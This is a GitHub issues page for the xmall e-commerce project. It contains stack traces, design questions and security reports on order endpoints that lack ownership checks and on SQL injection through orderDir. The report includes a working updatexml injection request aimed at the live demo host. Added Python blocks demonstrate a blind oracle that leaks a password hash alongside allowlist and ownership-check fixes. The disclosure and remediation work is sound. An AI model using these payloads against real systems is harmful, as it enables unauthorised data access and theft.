exrick / xmall

A distributed e-commerce shopping mall built on an SOA architecture, with separated front end and back end. Storefront: the Vue stack. Admin back end: Dubbo/SSM/Elasticsearch/Redis/MySQL/ActiveMQ/Shiro/Zookeeper and others.

Home Page: http://xmall.exrick.cn

License: GNU General Public License v3.0

Java 95.40% HTML 4.46% PHP 0.10% Makefile 0.01% CoffeeScript 0.04%
soa dubbo elasticsearch ssm redis mq shiro vue

xmall's People

Contributors

exrick

xmall's Issues

Search reports a "no such index" error

[item] IndexNotFoundException[no such index]
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.indexNotFoundException(IndexNameExpressionResolver.java:728)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.innerResolve(IndexNameExpressionResolver.java:680)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver$WildcardExpressionResolver.resolve(IndexNameExpressionResolver.java:636)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:163)
at org.elasticsearch.cluster.metadata.IndexNameExpressionResolver.concreteIndices(IndexNameExpressionResolver.java:138)
at org.elasticsearch.action.search.TransportSearchAction.resolveLocalIndices(TransportSearchAction.java:287)
at org.elasticsearch.action.search.TransportSearchAction.executeSearch(TransportSearchAction.java:301)
at org.elasticsearch.action.search.TransportSearchAction.lambda$doExecute$4(TransportSearchAction.java:193)
at org.elasticsearch.action.ActionListener$1.onResponse(ActionListener.java:60)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:114)
at org.elasticsearch.index.query.Rewriteable.rewriteAndFetch(Rewriteable.java:87)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:215)
at org.elasticsearch.action.search.TransportSearchAction.doExecute(TransportSearchAction.java:68)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:167)
at org.elasticsearch.xpack.security.action.filter.SecurityActionFilter.apply(SecurityActionFilter.java:124)
at org.elasticsearch.action.support.TransportAction$RequestFilterChain.proceed(TransportAction.java:165)
at org.elasticsearch.action.support.TransportAction.execute(TransportAction.java:139)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:83)
at org.elasticsearch.action.support.HandledTransportAction$TransportHandler.messageReceived(HandledTransportAction.java:73)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler$1.doRun(SecurityServerTransportInterceptor.java:250)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.xpack.security.transport.SecurityServerTransportInterceptor$ProfileSecuredRequestHandler.messageReceived(SecurityServerTransportInterceptor.java:308)
at org.elasticsearch.transport.RequestHandlerRegistry.processMessageReceived(RequestHandlerRegistry.java:66)
at org.elasticsearch.transport.TcpTransport$RequestHandler.doRun(TcpTransport.java:1288)
at org.elasticsearch.common.util.concurrent.AbstractRunnable.run(AbstractRunnable.java:37)
at org.elasticsearch.common.util.concurrent.EsExecutors$1.execute(EsExecutors.java:140)
at org.elasticsearch.transport.TcpTransport.handleRequest(TcpTransport.java:1246)
at org.elasticsearch.transport.TcpTransport.messageReceived(TcpTransport.java:1110)
at org.elasticsearch.transport.TcpTransport.inboundMessage(TcpTransport.java:913)
at org.elasticsearch.transport.netty4.Netty4MessageChannelHandler.channelRead(Netty4MessageChannelHandler.java:53)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at io.netty.handler.codec.ByteToMessageDecoder.fireChannelRead(ByteToMessageDecoder.java:323)
at io.netty.handler.codec.ByteToMessageDecoder.channelRead(ByteToMessageDecoder.java:297)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at io.netty.handler.logging.LoggingHandler.channelRead(LoggingHandler.java:241)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at io.netty.channel.AbstractChannelHandlerContext.fireChannelRead(AbstractChannelHandlerContext.java:340)
at io.netty.channel.DefaultChannelPipeline$HeadContext.channelRead(DefaultChannelPipeline.java:1434)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:362)
at io.netty.channel.AbstractChannelHandlerContext.invokeChannelRead(AbstractChannelHandlerContext.java:348)
at io.netty.channel.DefaultChannelPipeline.fireChannelRead(DefaultChannelPipeline.java:965)
at io.netty.channel.nio.AbstractNioByteChannel$NioByteUnsafe.read(AbstractNioByteChannel.java:163)
at io.netty.channel.nio.NioEventLoop.processSelectedKey(NioEventLoop.java:656)
at io.netty.channel.nio.NioEventLoop.processSelectedKeysPlain(NioEventLoop.java:556)
at io.netty.channel.nio.NioEventLoop.processSelectedKeys(NioEventLoop.java:510)
at io.netty.channel.nio.NioEventLoop.run(NioEventLoop.java:470)
at io.netty.util.concurrent.SingleThreadEventExecutor$5.run(SingleThreadEventExecutor.java:909)
at java.lang.Thread.run(Thread.java:745)

2019-10-12 09:39:48,654 [DubboServerHandler-172.21.63.129:20882-thread-15] [com.alibaba.dubbo.rpc.filter.ExceptionFilter]-[ERROR] [DUBBO] Got unchecked and undeclared exception which called by 172.21.63.129. service: cn.exrick.search.service.SearchService, method: search, exception: cn.exrick.common.exception.XmallException: 查询ES索引库出错 (error querying the ES index), dubbo version: 2.6.1, current host: 172.21.63.129
cn.exrick.common.exception.XmallException: 查询ES索引库出错 (error querying the ES index)
at cn.exrick.search.service.impl.SearchServiceImpl.search(SearchServiceImpl.java:176)
at com.alibaba.dubbo.common.bytecode.Wrapper1.invokeMethod(Wrapper1.java)
at com.alibaba.dubbo.rpc.proxy.javassist.JavassistProxyFactory$1.doInvoke(JavassistProxyFactory.java:45)
at com.alibaba.dubbo.rpc.proxy.AbstractProxyInvoker.invoke(AbstractProxyInvoker.java:71)
at com.alibaba.dubbo.config.invoker.DelegateProviderMetaDataInvoker.invoke(DelegateProviderMetaDataInvoker.java:48)
at com.alibaba.dubbo.rpc.protocol.InvokerWrapper.invoke(InvokerWrapper.java:52)
at com.alibaba.dubbo.rpc.filter.ExceptionFilter.invoke(ExceptionFilter.java:61)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.monitor.support.MonitorFilter.invoke(MonitorFilter.java:74)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.filter.TimeoutFilter.invoke(TimeoutFilter.java:41)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.protocol.dubbo.filter.TraceFilter.invoke(TraceFilter.java:77)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.filter.ContextFilter.invoke(ContextFilter.java:71)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.filter.GenericFilter.invoke(GenericFilter.java:131)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.filter.ClassLoaderFilter.invoke(ClassLoaderFilter.java:37)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.filter.EchoFilter.invoke(EchoFilter.java:37)
at com.alibaba.dubbo.rpc.protocol.ProtocolFilterWrapper$1.invoke(ProtocolFilterWrapper.java:68)
at com.alibaba.dubbo.rpc.protocol.dubbo.DubboProtocol$1.reply(DubboProtocol.java:102)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.handleRequest(HeaderExchangeHandler.java:96)
at com.alibaba.dubbo.remoting.exchange.support.header.HeaderExchangeHandler.received(HeaderExchangeHandler.java:168)
at com.alibaba.dubbo.remoting.transport.DecodeHandler.received(DecodeHandler.java:50)
at com.alibaba.dubbo.remoting.transport.dispatcher.ChannelEventRunnable.run(ChannelEventRunnable.java:79)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1142)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:617)
at java.lang.Thread.run(Thread.java:745)

[security vulnerability] Arbitrary Order Cancel Vulnerability

Recently, our team found an arbitrary order cancel vulnerability in the latest version of the project.

The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L54
Unauthorized access to the /member/cancelOrder API enables attackers to manipulate the POST parameter order and cancel orders belonging to other users.


To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the cancel operation.

[Security Vulnerability] Arbitrary Order Free Payment Vulnerability

Recently, our team found an arbitrary order free payment vulnerability in the latest version of the project. The vulnerability logic is located within the following file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L70

Unauthorized access to the /member/payOrder API allows attackers to manipulate the POST parameter tbThanks, thereby altering the payment status of any order, resulting in unauthorized free payments.


To mitigate this vulnerability, we strongly recommend that developers implement access control policies to restrict changes to the payment status.

[security vulnerability] Arbitrary Order Detail Access Vulnerability

Recently, our team found an arbitrary order detail access vulnerability in the latest version of the project.

The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L28

Access to the /member/orderList API is unauthorized, allowing attackers to manipulate the query param userId and access other users' order details, potentially compromising user privacy data.


To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.

SQL Injection Vulnerability exists in multiple interfaces of xmall

[Suggested description]
Xmall was discovered to contain a SQL injection vulnerability via the orderDir parameter.

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/Exrick/xmall

[Affected Product Code Base]
all versions

[Affected Component]

  • /item/list
  • /item/listSearch
  • /sys/log
  • /order/list
  • /member/list (need time-based blind injection)
  • /member/list/remove

[Attack Type]
Remote

[Vulnerability details]
Send the payload below to the interface /item/list

GET /item/list?draw=1&order%5B0%5D%5Bcolumn%5D=1&order%5B0%5D%5Bdir%5D=desc)a+union+select+updatexml(1,concat(0x7e,database(),0x7e,user(),0x7e),1)%23;&start=0&length=1&search%5Bvalue%5D=&search%5Bregex%5D=false&cid=-1&_=1679041197136 HTTP/1.1
Host: xmadmin.exrick.cn
Accept: application/json, text/javascript, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Referer: http://xmadmin.exrick.cn/product-list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,or;q=0.7
Cookie: JSESSIONID=359A406116392BB0456356EFBCF068FC
Connection: close


[Impact Code execution]
true

[Cause of vulnerability]
In the /item/list interface, the order[0][dir] parameter is not filtered and is passed into the getItemList function.
Then it is passed into the selectItemByCondition function.
In xmall-manager\xmall-manager-dao\src\main\java\cn\exrick\manager\mapper\TbItemMapper.xml, the orderDir parameter is used in ${} format, leading to a SQL injection vulnerability.

There are other similar interfaces:

  • /item/listSearch
  • /sys/log
  • /order/list
  • /member/list (need time-based blind injection)
  • /member/list/remove (need time-based blind injection)

That's all, thanks.
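The ${orderDir} interpolation this report describes, as an added example that is not the project's mapper or any code from the report. It is Python against an in-memory SQLite table because the report's MySQL payload (updatexml()) has no SQLite equivalent; here SQLite's integer-overflow error from abs() plays the role of updatexml() as the error oracle. The table names, sample rows, the admin hash and the column list are constructed for the demo. The vulnerable listing concatenates the direction into ORDER BY exactly as ${} does; the hardened listing allowlists the column index and the direction, which is the fix for every interface listed above, since ORDER BY cannot be supplied as a bind parameter.

```python
import sqlite3

# Constructed sample data; not taken from the project's database.
ITEMS = [(1, "Phone", 2999), (2, "Laptop", 5999), (3, "Mouse", 99)]
MEMBERS = [(1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99")]
COLUMNS = ["id", "title", "price"]   # DataTables order[0][column] index -> column name
ALLOWED_DIRS = {"asc", "desc"}


def make_db():
    """In-memory SQLite stand-in for an item table and a member table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_item (id INTEGER, title TEXT, price INTEGER)")
    conn.execute("CREATE TABLE tb_member (id INTEGER, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO tb_item VALUES (?, ?, ?)", ITEMS)
    conn.executemany("INSERT INTO tb_member VALUES (?, ?, ?)", MEMBERS)
    return conn


def list_items_vulnerable(conn, order_col, order_dir):
    """Mirrors a mapper that writes ${orderDir} into the statement: the direction is
    pasted into the SQL text, so whatever the client sends is executed as SQL."""
    sql = f"SELECT id, title, price FROM tb_item ORDER BY {COLUMNS[order_col]} {order_dir}"
    return conn.execute(sql).fetchall()


def oracle(conn, guess):
    """Error-based blind probe through the sort direction. The report's payload makes
    MySQL raise an error via updatexml(); SQLite raises 'integer overflow' for abs()
    of the smallest 64-bit integer, which serves the same purpose here.
    Returns True iff the guessed character is correct (query succeeded)."""
    payload = (
        "asc, CASE WHEN (SELECT substr(password_hash, 1, 1) FROM tb_member"
        f" WHERE username = 'admin') = '{guess}' THEN 1"
        " ELSE abs(-9223372036854775807 - 1) END"
    )
    try:
        list_items_vulnerable(conn, 0, payload)
        return True
    except sqlite3.DatabaseError:
        return False


def leak_first_hash_char(conn):
    """Recovers the first hex digit of the admin password hash, one request per guess."""
    for c in "0123456789abcdef":
        if oracle(conn, c):
            return c
    return None


def list_items_safe(conn, order_col, order_dir):
    """Hardened form: the column is chosen from an allowlist by index and the direction
    must be exactly asc or desc. Both still land in the SQL text (ORDER BY cannot be a
    bind parameter), but only values the server itself chose can get there."""
    if not 0 <= order_col < len(COLUMNS):
        raise ValueError("unknown sort column")
    direction = order_dir.strip().lower()
    if direction not in ALLOWED_DIRS:
        raise ValueError("sort direction must be asc or desc")
    sql = f"SELECT id, title, price FROM tb_item ORDER BY {COLUMNS[order_col]} {direction}"
    return conn.execute(sql).fetchall()


def direction_rejected(conn, order_dir):
    """True if the hardened listing refuses this direction value."""
    try:
        list_items_safe(conn, 0, order_dir)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("leaked first hash char:", leak_first_hash_char(db))
    print("payload rejected by safe listing:", direction_rejected(db, "desc) a union select 1 --"))
```

The allowlist compares the whole value, so the trailing comment (# in the report's MySQL payload, -- here), extra sort terms and case variants all fail the check rather than being partially stripped. The same mapping applies to each of the other listed interfaces: resolve the DataTables column index to a server-side column name and accept only the two literal directions.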

[To improve] Shopping cart persistence scheme

Problems with the current scheme, and why

  • Cart data is currently stored in Redis; memory is precious, and cart data may grow large over time

How to solve/optimize

  • Use MySQL or MongoDB

[security vulnerability] Arbitrary Order Deletion Vulnerability

Recently, our team found an arbitrary order deletion vulnerability in the latest version of the project.

The vulnerability logic is present in the file: https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L62
Unauthorized access to the /member/delOrder API enables attackers to manipulate the query param orderId and delete orders belonging to other users.


To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the order owner are authorized to perform the delete operation.

Shopping cart implementation

Is your cart item data put directly into Redis without being persisted to MySQL? If so, is that reasonable?

[BUG] Product inventory overselling problem

Problems with the current scheme, and why

  • Although any MySQL isolation level can avoid lost updates, under high concurrency lost updates in the database still occur and cause overselling

How to solve/optimize

  • The highest isolation level, SERIALIZABLE, but serializing is not desirable
  • Optimistic locking: update x set num = x where id = x and num = original stock; recommended for a single table
  • For multiple tables use a distributed lock, see the xboot project
  • Flash-sale scenario: use Redis transactions + WATCH
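The optimistic-lock update from this post, as an added example that is not the project's code, in Python against an in-memory SQLite table. simulate_race replays the interleaving behind overselling deterministically: both buyers read the stock before either writes. deduct_conditional goes beyond the post with the atomic form UPDATE ... SET num = num - 1 WHERE num >= 1, which needs no prior read and nothing to retry on. The table and column names are assumed; the page does not show the project's item schema.

```python
import sqlite3


# Constructed stock table; the project's real item columns are not shown on the page.
def make_db(stock):
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tb_item (id INTEGER PRIMARY KEY, num INTEGER NOT NULL)")
    conn.execute("INSERT INTO tb_item VALUES (1, ?)", (stock,))
    conn.commit()
    return conn


def read_stock(conn, item_id):
    return conn.execute("SELECT num FROM tb_item WHERE id = ?", (item_id,)).fetchone()[0]


def deduct_naive(conn, item_id, seen_num):
    """Read-then-write: stores seen_num - 1 no matter what the row holds by now."""
    if seen_num < 1:
        return False
    conn.execute("UPDATE tb_item SET num = ? WHERE id = ?", (seen_num - 1, item_id))
    conn.commit()
    return True


def deduct_optimistic(conn, item_id, seen_num):
    """The post's optimistic lock: update only if num still equals the value this request
    read. rowcount 0 means another request changed it first, so this sale is refused."""
    if seen_num < 1:
        return False
    cur = conn.execute("UPDATE tb_item SET num = ? WHERE id = ? AND num = ?",
                       (seen_num - 1, item_id, seen_num))
    conn.commit()
    return cur.rowcount == 1


def deduct_conditional(conn, item_id, _seen_num):
    """Beyond the post: the database does the arithmetic and the check in one statement,
    so there is no value to read first and no stale value to compare against."""
    cur = conn.execute("UPDATE tb_item SET num = num - 1 WHERE id = ? AND num >= 1",
                       (item_id,))
    conn.commit()
    return cur.rowcount == 1


def simulate_race(deduct, stock=1):
    """Two buyers read the stock before either writes, the interleaving behind overselling.
    Returns (number of successful sales, stock left)."""
    conn = make_db(stock)
    seen_a = read_stock(conn, 1)
    seen_b = read_stock(conn, 1)      # same value as seen_a
    sales = int(deduct(conn, 1, seen_a)) + int(deduct(conn, 1, seen_b))
    return sales, read_stock(conn, 1)


if __name__ == "__main__":
    for fn in (deduct_naive, deduct_optimistic, deduct_conditional):
        print(fn.__name__, simulate_race(fn))
```

With one unit in stock the naive path reports two sales, which is the oversell; both conditional forms report one. Under MySQL the same UPDATE ... WHERE num = ? acquires a row lock, so concurrent callers serialize on the row and the second one sees zero affected rows exactly as in the simulation.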

[Missing file] Login page is missing gt.js

GET http://localhost:8888/lib/gt.js net::ERR_ABORTED
which causes
$.ajax({
    url: '/geetestInit?t=' + (new Date()).getTime(), // random number to prevent caching
    type: "GET",
    dataType: 'json',
    success: function (data) {
        initGeetest({
            gt: data.gt,
            challenge: data.challenge,
            new_captcha: data.new_captcha, // marks a new-style captcha during an outage
            offline: !data.success, // whether the backend detected the Geetest server is down; usually no need to care
            product: "popup", // product form: float (click characters) or popup (slide)
            width: "100%"
        }, handler);
    }
});
to fail to initialize here

Waiting for the author's monolithic version of xmall

The mall's automatic e-mail sending function seems to be broken. I hope the author can send a copy of the monolithic xmall after seeing this; time is a bit tight, thanks.

[security vulnerability] Arbitrary Order Detail Access Vulnerability

Recently, our team found an arbitrary order detail access vulnerability (different from #79) in the latest version of the project.
The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L36

The developer failed to check the ownership of the order with the access user when querying the order details via orderService.getOrder(), allowing attackers to manipulate the query param orderId of API /member/orderDetail and access other users' order details, potentially compromising user privacy data.


To address this vulnerability, we strongly recommend that developers implement access control policies to ensure that only privileged users or the owner can access the order information.

Permission checks

Many user-related operations have no permission checks. The token is basically unused in the project.

👍

Turning a video tutorial into an open-source project like this is really impressive. Respect to the author 👍

[security vulnerability] Arbitrary Order Addition Vulnerability

Recently, our team found an arbitrary order addition vulnerability in the latest version of the project.

The vulnerability logic is present in the file:
https://github.com/Exrick/xmall/blob/master/xmall-front-web/src/main/java/cn/exrick/front/controller/OrderController.java#L46
Access to the /member/addOrder API is unauthorized, allowing attackers to add orders as any user via a crafted orderInfo object.


To address this vulnerability, we strongly recommend that developers implement access control policies to limit the order addition operation.
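The ownership check these reports ask for (orderList, orderDetail, cancelOrder, delOrder, addOrder and payOrder), as an added example written for this page rather than taken from the project. It is Python as a framework-independent sketch of the controller logic: the Order fields, the session user id passed to each handler, the order ids and the HMAC-signed payment notification are assumptions, since the page shows neither the project's order model nor its payment gateway integration. The one rule every handler follows is that the user comes from the authenticated session and never from the request.

```python
import hashlib
import hmac
from dataclasses import dataclass

# Everything below is a constructed stand-in: fields, ids and the HMAC scheme are assumed.
GATEWAY_SECRET = b"demo-gateway-secret"   # assumed secret shared with the payment gateway


@dataclass
class Order:
    order_id: str
    user_id: int
    amount: int             # cents
    status: str = "UNPAID"  # UNPAID -> PAID | CANCELLED | DELETED


class NotFound(Exception):
    """Raised for missing and for foreign orders alike, so a caller cannot learn
    which order ids exist by probing."""


def sign_notification(secret, order_id, amount, status):
    """Assumed gateway scheme: HMAC-SHA256 over the notified fields."""
    msg = f"{order_id}|{amount}|{status}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()


class MemberOrderApi:
    """Each handler takes user_id from the authenticated session; nothing in the request
    body or query string may name the user or set the payment state."""

    def __init__(self, orders, gateway_secret=GATEWAY_SECRET):
        self._orders = {o.order_id: o for o in orders}
        self._secret = gateway_secret
        self._next_id = len(orders) + 1

    def _owned(self, user_id, order_id):
        o = self._orders.get(order_id)
        if o is None or o.user_id != user_id:
            raise NotFound(order_id)
        return o

    def order_list(self, user_id):                  # /member/orderList: no client userId
        return [o for o in self._orders.values()
                if o.user_id == user_id and o.status != "DELETED"]

    def order_detail(self, user_id, order_id):      # /member/orderDetail
        return self._owned(user_id, order_id)

    def cancel_order(self, user_id, order_id):      # /member/cancelOrder
        o = self._owned(user_id, order_id)
        if o.status != "UNPAID":
            raise ValueError("only unpaid orders can be cancelled")
        o.status = "CANCELLED"
        return o

    def del_order(self, user_id, order_id):         # /member/delOrder
        o = self._owned(user_id, order_id)
        o.status = "DELETED"
        return o

    def add_order(self, user_id, order_info):       # /member/addOrder
        # any userId inside orderInfo is ignored; the server assigns owner and id
        o = Order(f"O{self._next_id}", user_id, int(order_info["amount"]))
        self._next_id += 1
        self._orders[o.order_id] = o
        return o

    def pay_order(self, user_id, order_id, notification):   # /member/payOrder
        """The only path to PAID is a gateway notification whose signature verifies
        and whose order id, amount and result match the stored order."""
        o = self._owned(user_id, order_id)
        expected = sign_notification(self._secret, notification["orderId"],
                                     notification["amount"], notification["status"])
        if not hmac.compare_digest(expected, str(notification.get("sign", ""))):
            raise PermissionError("bad signature")
        if (notification["orderId"] != order_id or int(notification["amount"]) != o.amount
                or notification["status"] != "SUCCESS"):
            raise PermissionError("notification does not match order")
        o.status = "PAID"
        return o


def outcome(fn, *args):
    """Collapse a handler call into a short label for the demo."""
    try:
        return fn(*args).status
    except NotFound:
        return "not found"
    except (PermissionError, ValueError) as e:
        return f"rejected: {e}"


def demo():
    """Constructed scenario: user 1 owns O1, user 2 owns O2, user 2 attacks O1."""
    api = MemberOrderApi([Order("O1", 1, 2999), Order("O2", 2, 5999)])
    forged = {"orderId": "O1", "amount": 2999, "status": "SUCCESS", "sign": "0" * 64}
    genuine = dict(forged, sign=sign_notification(GATEWAY_SECRET, "O1", 2999, "SUCCESS"))
    return {
        "user2 reads O1": outcome(api.order_detail, 2, "O1"),
        "user2 cancels O1": outcome(api.cancel_order, 2, "O1"),
        "user2 deletes O1": outcome(api.del_order, 2, "O1"),
        "user2 lists": [o.order_id for o in api.order_list(2)],
        "owner of order added with spoofed userId": api.add_order(2, {"userId": 1, "amount": 10}).user_id,
        "forged pay by owner": outcome(api.pay_order, 1, "O1", forged),
        "genuine pay by owner": outcome(api.pay_order, 1, "O1", genuine),
        "cancel after pay": outcome(api.cancel_order, 1, "O1"),
    }
```

Two design points worth keeping when porting this back into the controllers: the foreign-order case returns the same "not found" as a nonexistent id, so the endpoints stop being an oracle for valid order ids, and payment state is never taken from a request flag like tbThanks but only from a notification the server can verify against the order it already holds.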

Search

Hi, el-autocomplete search is not working on the live site; is the feature unfinished?

Monolithic version problem

What is this problem: {"success":false,"message":"你手速怎么这么快,请点慢一点","code":500,"timestamp":1545190498198,"result":null} (message: "Why are you clicking so fast, please click more slowly")

Statement

This project will serve as the author's 2018 undergraduate graduation project and is being open-sourced early; please do not plagiarize it. After the graduation project is done, deployment, detailed documentation, project architecture and so on will be completed.

Could someone explain this error?

org.springframework.beans.factory.UnsatisfiedDependencyException: Error creating bean with name 'shiroFilter': Unsatisfied dependency expressed through field 'systemService'; nested exception is org.springframework.beans.factory.BeanCreationException: Error creating bean with name 'systemService': FactoryBean threw exception on object creation; nested exception is java.lang.IllegalStateException: Failed to check the status of the service cn.exrick.manager.service.SystemService. No provider available for the service cn.exrick.manager.service.SystemService from the url zookeeper://127.0.0.1:2181/com.alibaba.dubbo.registry.RegistryService?application=xmall-manager-web&dubbo=2.6.1&interface=cn.exrick.manager.service.SystemService&methods=countLog,deleteLog,getLogList,updateBase,getWeekHot,getShiroFilter,countShiroFilter,addLog,addShiroFilter,getBase,updateShiroFilter,deleteShiroFilter&pid=42124&register.ip=169.254.135.39&revision=1.0-SNAPSHOT&side=consumer&timestamp=1529023738625 to the consumer 169.254.135.39 use dubbo version 2.6.

Search error

Hello, the search function of the standalone version keeps reporting an error; is there a fix?
